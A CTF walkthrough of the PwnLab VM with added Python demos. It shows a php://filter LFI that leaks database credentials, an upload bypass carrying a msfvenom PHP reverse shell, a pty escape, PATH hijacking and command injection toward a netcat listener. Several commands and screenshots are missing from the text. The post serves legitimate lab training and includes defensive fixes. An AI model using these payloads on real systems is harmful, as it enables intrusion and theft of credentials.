PwnLab CTF Walkthrough

Hi folks, today we will walk through the PwnLab CTF penetration testing challenge. You can find this interesting VM here. As stated by the author, our goal is to root the box and find the flag.txt file, so let's start ;)

As part of enumeration I fired up nmap to find out which services were running on the target machine.

I noticed that ports 80 (HTTP) and 3306 (MySQL) were open, so next I decided to run nikto to get some juicy information.

nikto gave me a hint that the config.php file contains a username and password, so now I needed a way to read config.php. I quickly went to the web application to check for a possible LFI.

Next I tried to inject a simple LFI payload, but nothing happened.

So I decided to look for ways to bypass the LFI protection and came across my friend Aaditya's blog, which has a nice write-up. After that I injected the following payload and got the contents of config.php back:

Next I base64-decoded this data and got the database credentials, as shown below.
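The way the file comes back base64-encoded is the php://filter wrapper trick: the include() still happens, but the stream filter encodes the file on the way in, so PHP never executes it and the raw source lands in the HTML. Below is an added example (my own code, not from the original post or the Aaditya write-up) that builds that payload, pulls the base64 blob out of a response and parses the credentials. The parameter name `page`, the target URL and the config.php contents are assumptions; the response is a constructed sample, not the real PwnLab file.

```python
"""Added example: php://filter LFI payload, response decoding and credential parsing.
The URL, the parameter name and SAMPLE_CONFIG are assumptions/constructed data."""
import base64
import re
from urllib.parse import urlencode


def build_filter_payload(base_url: str, param: str, target: str) -> str:
    """Wrap the target in php://filter so include() returns it base64-encoded
    instead of executing it.  If the include appends ".php" itself (assumption
    here), pass the bare name, e.g. "config"; otherwise pass "config.php"."""
    wrapper = f"php://filter/convert.base64-encode/resource={target}"
    return f"{base_url}?{urlencode({param: wrapper})}"


def extract_base64_blob(html: str) -> str:
    """The encoded file is embedded among normal markup; take the longest run of
    base64 alphabet characters (with optional '=' padding)."""
    runs = re.findall(r"[A-Za-z0-9+/]{20,}={0,2}", html)
    if not runs:
        raise ValueError("no base64 blob found in response")
    return max(runs, key=len)


def decode_lfi_response(html: str) -> str:
    """Recover the file source from a response produced by build_filter_payload()."""
    return base64.b64decode(extract_base64_blob(html)).decode("utf-8", "replace")


def parse_php_credentials(source: str) -> dict:
    """Collect $name = "value"; assignments, the usual shape of a config.php."""
    pairs = re.findall(r'\$(\w+)\s*=\s*["\']([^"\']*)["\']\s*;', source)
    return dict(pairs)


# Constructed sample config.php (NOT the real PwnLab file) and a fake page that
# wraps its base64 the way the vulnerable include() would.
SAMPLE_CONFIG = (
    '<?php\n$server\t= "localhost";\n$username = "dbuser";\n'
    '$password = "S3cr3tP@ss";\n$database = "Users";\n?>\n'
)
SAMPLE_RESPONSE = (
    "<html><body>" + base64.b64encode(SAMPLE_CONFIG.encode()).decode() + "</body></html>"
)

if __name__ == "__main__":
    print(build_filter_payload("http://target/index.php", "page", "config"))
    print(parse_php_credentials(decode_lfi_response(SAMPLE_RESPONSE)))
```

The defensive takeaway is the same as the offensive one: a whitelist of page names (or a fixed map from parameter value to file) stops both the plain `../` traversal and the wrapper, because the user-controlled string never reaches include() at all.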

Now that we have the database credentials, let's access the database.

Let's look inside the users table.

Bam! We got the usernames and passwords. The passwords look base64-encoded, so let's decode them and log in :)

Here we have an option to upload a file, so with an attacker's mindset I tried to upload a PHP file, but that was not allowed. Next the idea came to me that I could check the source code of upload.php using the LFI vulnerability.

As shown, it allows only four extensions and also checks the MIME type. After digging I found a way to get a shell anyway.

 msfvenom -p php/meterpreter/reverse_tcp lhost= lport=31337 -f raw

This command creates a PHP reverse shell that connects back to our IP on the given port.
The output of this command looks like this:

Or you can use any other reverse shell. Next, all you need to do is copy the code from <?php to die();, create a file with a .gif extension, put the GIF magic bytes GIF89a on the first line, and then paste the code below it, which looks like this:

Let's upload this ;)

The file uploaded successfully. Next we need to get this shell code executed so that our reverse shell connects back to us. After digging a lot I found that the lang parameter in index.php is vulnerable to LFI, so I started Tamper Data to modify the request and quickly went to the page; meanwhile I started Metasploit and set up the exploit handler with the following commands.

As shown above, we have filled in all the required options, so type exploit and move on to tampering with the request in order to inject the lang parameter.

Basically, here we are executing our malicious code, so as soon as you hit OK we get a meterpreter session.

Now we have our shell, but it is still limited, so let's first get a stable shell. We need to confirm whether Python is installed, and then we can spawn a proper TTY as shown below.

echo "import pty; pty.spawn('/bin/bash')" > /tmp/
python /tmp/

As we have login credentials for three different users, let's log in as each of them and look for further hints.

After digging around kane's directory I found a file called msgmike. I tried to run it but was not allowed, and I figured out that it actually calls cat without an absolute path.

So I created a fake cat command and exported the PATH as follows:

Again, after digging around mike's directories I found an interesting file called msg2root.
Later I found out that it echoes back everything you give it, so I tried to execute commands through it.
Then I set up a netcat listener on port 1337 and executed the following command.
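Both msgmike and msg2root fall to the same class of mistake: a privileged program trusts its environment or its input when it builds a command. Below is an added example (my own code, not the post's and not the real binaries) that reproduces the two patterns with throw-away stand-in scripts: a program that runs `cat` by bare name so PATH decides which cat runs, and a program that splices a message into a shell command line so a `;` ends the echo and starts our command. The stand-ins, file names and the `echo INJECTED` marker are constructed for the demo; the post's reverse shell would go where the marker is.

```python
"""Added example: PATH hijacking (msgmike pattern) and shell command injection
(msg2root pattern), demonstrated with constructed stand-ins, not the real binaries."""
import os
import shutil
import stat
import subprocess
import tempfile


def run(cmd, env=None) -> str:
    """Run a command and return its stdout as text."""
    return subprocess.run(cmd, env=env, text=True, capture_output=True).stdout


def path_hijack_demo() -> tuple:
    """msgmike-style bug: a privileged program runs `cat <file>` and lets PATH
    choose the binary.  Returns (output with hijacked PATH, output with absolute
    path) so the two behaviours can be compared."""
    real_cat = shutil.which("cat")
    with tempfile.TemporaryDirectory() as tmp:
        victim = os.path.join(tmp, "victim.txt")
        with open(victim, "w") as f:
            f.write("real file contents\n")
        # attacker's fake cat in a directory we control; the real one would
        # spawn a shell, here it just proves it ran
        fake_cat = os.path.join(tmp, "cat")
        with open(fake_cat, "w") as f:
            f.write("#!/bin/sh\necho HIJACKED: running as $(id -un)\n")
        os.chmod(fake_cat, os.stat(fake_cat).st_mode | stat.S_IXUSR)
        # export PATH=/our/dir:$PATH, as done against msgmike
        env = dict(os.environ, PATH=tmp + os.pathsep + os.environ.get("PATH", ""))
        hijacked = run(["/bin/sh", "-c", f"cat {victim}"], env=env)       # bare name
        safe = run(["/bin/sh", "-c", f"{real_cat} {victim}"], env=env)    # absolute path
    return hijacked, safe


def msg2root_vulnerable(message: str) -> str:
    """msg2root-style bug: the message is concatenated into a shell command line,
    so ';', '|', backticks or $() in the message run commands of our choosing."""
    return run(["/bin/sh", "-c", "/bin/echo " + message])


def msg2root_fixed(message: str) -> str:
    """Argument vector and no shell: the same metacharacters reach echo as data."""
    return run(["/bin/echo", message])


if __name__ == "__main__":
    hijacked, safe = path_hijack_demo()
    print(hijacked.strip(), "|", safe.strip())
    # against the real msg2root the marker would be replaced by a netcat
    # connect-back to the listener on port 1337
    print(msg2root_vulnerable("hi; echo INJECTED"))
    print(msg2root_fixed("hi; echo INJECTED"))
```

The fixes are the mirror image of the attacks: call helpers by absolute path (or reset PATH to a known value before calling anything) in setuid code, and never pass user-controlled text through system() or a shell; build an argv and exec directly.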

and here you go ;)

